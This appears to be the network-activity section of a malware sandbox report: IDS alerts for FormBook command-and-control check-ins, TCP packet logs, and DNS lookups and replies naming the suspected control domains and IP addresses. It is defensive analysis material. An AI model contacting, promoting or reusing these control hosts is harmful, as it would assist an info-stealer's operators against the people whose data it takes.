2024-11-07T15:28:27.776036+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49851 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:47.802064+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49955 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:50.411846+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49969 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:52.899048+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49981 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:55.479688+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49993 | 3.33.130.190 | 80 | TCP
2024-11-07T15:28:55.479688+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49993 | 3.33.130.190 | 80 | TCP
2024-11-07T15:29:01.378338+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49994 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:03.932155+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49995 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:06.449463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49996 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:09.004729+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49997 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:09.004729+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49997 | 199.192.19.19 | 80 | TCP
2024-11-07T15:29:14.989019+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49998 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:17.523090+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 49999 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:20.065290+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50000 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:23.075547+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 50001 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:23.075547+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 50001 | 208.91.197.27 | 80 | TCP
2024-11-07T15:29:29.814343+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50002 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:32.709103+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50003 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:35.365443+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50004 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:44.886986+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 50005 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:44.886986+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 50005 | 156.242.132.82 | 80 | TCP
2024-11-07T15:29:58.903671+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50006 | 84.32.84.32 | 80 | TCP
2024-11-07T15:30:02.614463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.8 | 50007 | 84.32.84.32 | 80 | TCP
                                                                      Nov 7, 2024 15:28:22.624289989 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:23.506098986 CET4982280192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:23.510865927 CET80498223.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.524873018 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.529762983 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.529875040 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.540694952 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:24.545723915 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:24.545737982 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:25.156512976 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:25.156568050 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:26.052872896 CET4983880192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:26.057718992 CET80498383.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.071655035 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.076504946 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.076582909 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.083715916 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.088620901 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.743560076 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.775923014 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:27.776036024 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.777091980 CET4985180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:27.782174110 CET80498513.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.154922009 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.159895897 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.159986973 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.170686007 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:47.175647974 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.802010059 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:47.802063942 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:48.678050041 CET4995580192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:48.683033943 CET80499553.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:49.702297926 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.707134008 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:49.707214117 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.732711077 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:49.737550020 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:50.411787987 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:50.411845922 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:51.242533922 CET4996980192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:51.247627974 CET80499693.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.259645939 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.265984058 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.266052961 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.278417110 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:52.283416033 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.283441067 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.896075964 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:52.899048090 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:53.787300110 CET4998180192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:53.792851925 CET80499813.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:54.805936098 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.811059952 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:54.815015078 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.822185993 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:54.827241898 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.476773977 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.479547024 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:28:55.479687929 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:55.480509043 CET4999380192.168.2.83.33.130.190
                                                                      Nov 7, 2024 15:28:55.485591888 CET80499933.33.130.190192.168.2.8
                                                                      Nov 7, 2024 15:29:00.662404060 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.667334080 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:00.667419910 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.684931040 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:00.689893961 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378232002 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378258944 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378271103 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378278017 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378283978 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378312111 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378329039 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378338099 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378344059 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378359079 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378367901 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378372908 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.378381014 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.378463030 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.383434057 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383459091 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383471012 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.383579969 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:01.497917891 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498405933 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498421907 CET8049994199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:01.498658895 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:02.193593979 CET4999480192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.212639093 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.218561888 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.218733072 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.230871916 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.235754013 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932053089 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932115078 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932154894 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932164907 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932197094 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932208061 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932219982 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932230949 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932244062 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932245016 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932259083 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932271004 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.932280064 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932303905 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.932322979 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:03.937340021 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937366009 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937376976 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:03.937419891 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.050769091 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050801039 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050843000 CET8049995199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:04.050842047 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.050889015 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:04.740375042 CET4999580192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.760272026 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.765213013 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:05.765292883 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.778769016 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:05.783915043 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:05.783968925 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449321032 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449357033 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449372053 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449385881 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449399948 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449412107 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449425936 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449441910 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.449462891 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.449527025 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.450450897 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.450515032 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.450557947 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.454427958 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454495907 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454509020 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454523087 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.454541922 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.454569101 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.566348076 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566361904 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566416025 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:06.566472054 CET8049996199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:06.566514969 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:07.287633896 CET4999680192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.306881905 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.311841965 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:08.311944962 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.320657969 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:08.325474977 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004515886 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004534960 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004548073 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004559040 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004573107 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004585028 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004599094 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004611969 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004729033 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.004729986 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.004838943 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.004978895 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.005354881 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.011265039 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011277914 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011291981 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.011444092 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.123228073 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123262882 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123276949 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:09.123337030 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.123502016 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.128911018 CET4999780192.168.2.8199.192.19.19
                                                                      Nov 7, 2024 15:29:09.134144068 CET8049997199.192.19.19192.168.2.8
                                                                      Nov 7, 2024 15:29:14.376620054 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.382113934 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.382174015 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.395114899 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:14.400079966 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.988385916 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:14.989018917 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:15.896706104 CET4999880192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:15.901813984 CET8049998208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:16.915725946 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.920605898 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:16.920878887 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.931986094 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:16.937261105 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:17.519298077 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:17.523089886 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:18.443485975 CET4999980192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:18.448491096 CET8049999208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.462199926 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.467170954 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.467308044 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.478890896 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:19.484260082 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:19.484276056 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:20.065169096 CET8050000208.91.197.27192.168.2.8
                                                                      Nov 7, 2024 15:29:20.065289974 CET5000080192.168.2.8208.91.197.27
                                                                      Nov 7, 2024 15:29:20.990864992 CET5000080192.168.2.8208.91.197.27
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 7, 2024 15:27:36.892687082 CET | 192.168.2.8 | 1.1.1.1 | 0xb794 | Standard query (0) | www.multileveltravel.world | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:27:52.634691000 CET | 192.168.2.8 | 1.1.1.1 | 0x11bc | Standard query (0) | www.falconclub.online | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:06.012183905 CET | 192.168.2.8 | 1.1.1.1 | 0xa96e | Standard query (0) | www.promasterev.shop | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:19.400434971 CET | 192.168.2.8 | 1.1.1.1 | 0x9f74 | Standard query (0) | www.childlesscatlady.today | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:32.790978909 CET | 192.168.2.8 | 1.1.1.1 | 0x565a | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:33.802906990 CET | 192.168.2.8 | 1.1.1.1 | 0x565a | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:34.802881002 CET | 192.168.2.8 | 1.1.1.1 | 0x565a | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:38.073407888 CET | 192.168.2.8 | 1.1.1.1 | 0x1e96 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:39.084252119 CET | 192.168.2.8 | 1.1.1.1 | 0x1e96 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:40.100140095 CET | 192.168.2.8 | 1.1.1.1 | 0x1e96 | Standard query (0) | www.animekuid.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:47.135505915 CET | 192.168.2.8 | 1.1.1.1 | 0x97c0 | Standard query (0) | www.doggieradio.net | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:00.494671106 CET | 192.168.2.8 | 1.1.1.1 | 0x727a | Standard query (0) | www.demovix.xyz | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:14.147852898 CET | 192.168.2.8 | 1.1.1.1 | 0x9115 | Standard query (0) | www.palcoconnector.net | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:28.088310957 CET | 192.168.2.8 | 1.1.1.1 | 0x86cb | Standard query (0) | www.shanhaiguan.net | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:49.901207924 CET | 192.168.2.8 | 1.1.1.1 | 0x7efb | Standard query (0) | www.mtcep.org | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:57.979041100 CET | 192.168.2.8 | 1.1.1.1 | 0x4975 | Standard query (0) | www.es-lidl.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 15:27:36.918123960 CET | 1.1.1.1 | 192.168.2.8 | 0xb794 | No error (0) | www.multileveltravel.world | multileveltravel.world | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:27:36.918123960 CET | 1.1.1.1 | 192.168.2.8 | 0xb794 | No error (0) | multileveltravel.world | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:27:36.918123960 CET | 1.1.1.1 | 192.168.2.8 | 0xb794 | No error (0) | multileveltravel.world | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:27:52.677510977 CET | 1.1.1.1 | 192.168.2.8 | 0x11bc | No error (0) | www.falconclub.online | | 74.208.236.25 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:06.024117947 CET | 1.1.1.1 | 192.168.2.8 | 0xa96e | No error (0) | www.promasterev.shop | promasterev.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:28:06.024117947 CET | 1.1.1.1 | 192.168.2.8 | 0xa96e | No error (0) | promasterev.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:06.024117947 CET | 1.1.1.1 | 192.168.2.8 | 0xa96e | No error (0) | promasterev.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:19.424321890 CET | 1.1.1.1 | 192.168.2.8 | 0x9f74 | No error (0) | www.childlesscatlady.today | childlesscatlady.today | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:28:19.424321890 CET | 1.1.1.1 | 192.168.2.8 | 0x9f74 | No error (0) | childlesscatlady.today | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:19.424321890 CET | 1.1.1.1 | 192.168.2.8 | 0x9f74 | No error (0) | childlesscatlady.today | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:36.050856113 CET | 1.1.1.1 | 192.168.2.8 | 0x565a | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:36.050872087 CET | 1.1.1.1 | 192.168.2.8 | 0x565a | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:36.050909996 CET | 1.1.1.1 | 192.168.2.8 | 0x565a | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:41.079432964 CET | 1.1.1.1 | 192.168.2.8 | 0x1e96 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:41.079451084 CET | 1.1.1.1 | 192.168.2.8 | 0x1e96 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:41.079471111 CET | 1.1.1.1 | 192.168.2.8 | 0x1e96 | Server failure (2) | www.animekuid.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:47.149298906 CET | 1.1.1.1 | 192.168.2.8 | 0x97c0 | No error (0) | www.doggieradio.net | doggieradio.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:28:47.149298906 CET | 1.1.1.1 | 192.168.2.8 | 0x97c0 | No error (0) | doggieradio.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:28:47.149298906 CET | 1.1.1.1 | 192.168.2.8 | 0x97c0 | No error (0) | doggieradio.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:00.658840895 CET | 1.1.1.1 | 192.168.2.8 | 0x727a | No error (0) | www.demovix.xyz | | 199.192.19.19 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:14.373718977 CET | 1.1.1.1 | 192.168.2.8 | 0x9115 | No error (0) | www.palcoconnector.net | | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:28.555385113 CET | 1.1.1.1 | 192.168.2.8 | 0x86cb | No error (0) | www.shanhaiguan.net | | 156.242.132.82 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:29:49.918687105 CET | 1.1.1.1 | 192.168.2.8 | 0x7efb | Name error (3) | www.mtcep.org | none | none | A (IP address) | IN (0x0001) | false
